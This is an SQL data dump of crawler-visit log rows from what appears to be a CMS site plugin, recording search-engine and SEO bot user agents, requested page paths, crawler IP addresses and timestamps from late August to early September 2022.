INSERT INTO `ey_weapp_spider_visit` VALUES ('96985', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bsq.html', '114.119.151.153', '1661541749', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96986', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/101_5.html', '185.191.171.15', '1661542270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96987', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/167.html', '114.119.151.153', '1661543189', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96989', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_36/', '216.244.66.194', '1661543541', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96991', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/145.html', '207.46.13.144', '1661544616', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96992', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/gy.html', '114.119.151.153', '1661544964', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96993', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/202.html', '114.119.151.153', '1661545400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96995', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1661546045', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97006', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.108', '1661553491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97055', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1661569414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97056', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/303.html', '66.249.79.110', '1661569674', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97057', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661569742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97058', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661570020', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97059', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_12.html', '185.191.171.7', '1661571081', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97060', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661572419', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97061', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/177.html', '66.249.79.108', '1661572444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97062', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_43/', '185.191.171.38', '1661572512', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97064', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products', '185.191.171.3', '1661572684', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97065', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_22.html', '185.191.171.21', '1661573127', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97093', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/?lailu=www.zztly.cn', '185.191.171.8', '1661584862', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97094', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sxs.html', '114.119.151.155', '1661584893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97095', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/list_2_2/', '185.191.171.21', '1661585335', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97097', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/21.html', '185.191.171.6', '1661585748', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97098', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/496.html', '114.119.151.153', '1661586298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97099', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_45.html', '185.191.171.7', '1661586304', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97100', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661587926', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97101', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661588000', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97102', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_3.html', '185.191.171.7', '1661588135', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97103', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/94.html', '185.191.171.4', '1661588463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97104', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_22.html', '185.191.171.2', '1661589031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97105', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_18.html', '185.191.171.10', '1661589664', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97107', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.166', '1661590527', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97109', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/379.html', '185.191.171.37', '1661592049', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97111', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/343.html', '116.179.32.152', '1661593436', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97113', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/288.html', '116.179.32.34', '1661594326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97114', '99', 'mozilla/5.0 (compatible; mrgbot/1.0;', '/', '62.231.95.189', '1661594394', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97115', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.34', '1661595220', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97118', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/296.html', '116.179.32.172', '1661596113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97119', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/185_2.html', '185.191.171.40', '1661596225', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97120', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/186.html', '185.191.171.13', '1661596348', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97127', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/100.html', '66.249.79.110', '1661598183', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97128', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_10.html', '185.191.171.40', '1661598332', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97129', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661598364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97130', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/20.html', '66.249.79.112', '1661598586', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97131', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.112', '1661598637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97134', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1661599304', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97137', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tbxw/list_91_2/', '185.191.171.7', '1661600011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97558', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/229.html', '66.249.79.106', '1661789148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97559', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.106', '1661789209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97560', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.110', '1661789209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97561', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/43.html', '220.181.108.145', '1661789211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97562', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1661790224', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97563', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661791965', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97564', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/69.html', '185.191.171.2', '1661792235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97565', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/336.html', '66.249.79.106', '1661792559', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97566', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/467.html', '185.191.171.26', '1661793563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97567', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/106.html', '185.191.171.5', '1661794956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97568', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/490.html', '185.191.171.18', '1661795935', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97569', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '36.133.62.12', '1661796017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97570', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/210.html', '66.249.79.112', '1661796361', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97571', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_3.html', '185.191.171.36', '1661796627', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97572', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24.html?tagid=24', '185.191.171.17', '1661796857', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97573', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_22.html', '185.191.171.10', '1661797130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97574', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/case/236.html', '207.46.13.144', '1661797626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97575', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/280.html', '185.191.171.40', '1661797893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97576', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_47/', '66.249.79.108', '1661799277', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97577', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/139.html', '66.249.79.108', '1661800161', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97578', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/list_4_3/', '185.191.171.7', '1661801218', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97579', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/20_2.html', '185.191.171.17', '1661803456', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97580', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/94.html', '185.191.171.22', '1661803763', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97581', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/64.html', '116.179.32.165', '1661803779', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97582', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661804837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97583', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_16/', '116.179.32.43', '1661804870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97584', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/186.html', '185.191.171.34', '1661805107', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97585', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661805259', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97586', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/chezaibengal', '116.179.32.215', '1661805962', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97587', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/4_8.html', '220.181.108.156', '1661805963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97588', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_13/', '116.179.32.33', '1661805963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97589', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.191.122', '1661806079', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97590', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/192.html', '66.249.79.108', '1661806113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97591', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_29.html', '185.191.171.22', '1661806565', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97592', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/liaoyang.html', '114.119.151.155', '1661807128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97593', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/184.html', '185.191.171.13', '1661807351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97594', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/192.html', '66.249.79.110', '1661807450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97597', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661808464', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97598', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.80', '1661808555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97599', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.147', '1661808555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97600', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_12', '114.119.151.153', '1661808733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97602', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_11/', '114.119.151.155', '1661809527', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97603', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_33/', '114.119.151.153', '1661810069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97604', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yzs.html', '114.119.151.153', '1661810337', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97605', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sqs.html', '114.119.151.153', '1661810612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97606', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/252.html', '185.191.171.38', '1661810771', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97607', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/16.html', '114.119.151.153', '1661810880', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97608', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zts.html', '114.119.151.155', '1661811142', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97609', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/357.html', '185.191.171.13', '1661811274', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97610', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hebi.html', '114.119.151.153', '1661811427', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97611', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.93', '1661811529', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97612', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/213.html', '114.119.151.155', '1661811692', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97613', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/87.html', '114.119.151.155', '1661811969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97614', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ycs.html', '114.119.151.153', '1661812256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97615', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_22/', '216.244.66.194', '1661813210', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97616', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.110', '1661814716', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97617', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/461.html', '216.244.66.194', '1661815703', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97618', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_65/', '66.249.79.110', '1661817854', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97619', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_18/', '220.181.108.111', '1661818093', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97620', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/37_2.html', '185.191.171.12', '1661818154', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97621', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/23_4.html', '66.249.79.108', '1661818302', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97622', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.112', '1661818412', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97623', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661819151', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97624', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/109.html', '220.181.108.165', '1661819277', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97630', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljwd/list_20_4/', '185.191.171.34', '1661823315', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97631', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/219.html', '185.191.171.9', '1661824684', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97632', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/132.html', '116.179.32.151', '1661825487', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97639', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_30/', '185.191.171.24', '1661829645', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98447', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/242.html', '162.55.86.60', '1662195526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98448', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/246.html', '162.55.86.60', '1662195558', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98449', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/247.html', '162.55.86.60', '1662195589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98450', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/251.html', '162.55.86.60', '1662195621', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98452', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/286.html', '162.55.86.60', '1662195683', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98454', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/296.html', '162.55.86.60', '1662195745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98455', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/297.html', '162.55.86.60', '1662195776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98463', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/322.html', '162.55.86.60', '1662196025', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98464', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/370.html', '162.55.86.60', '1662196056', '0');
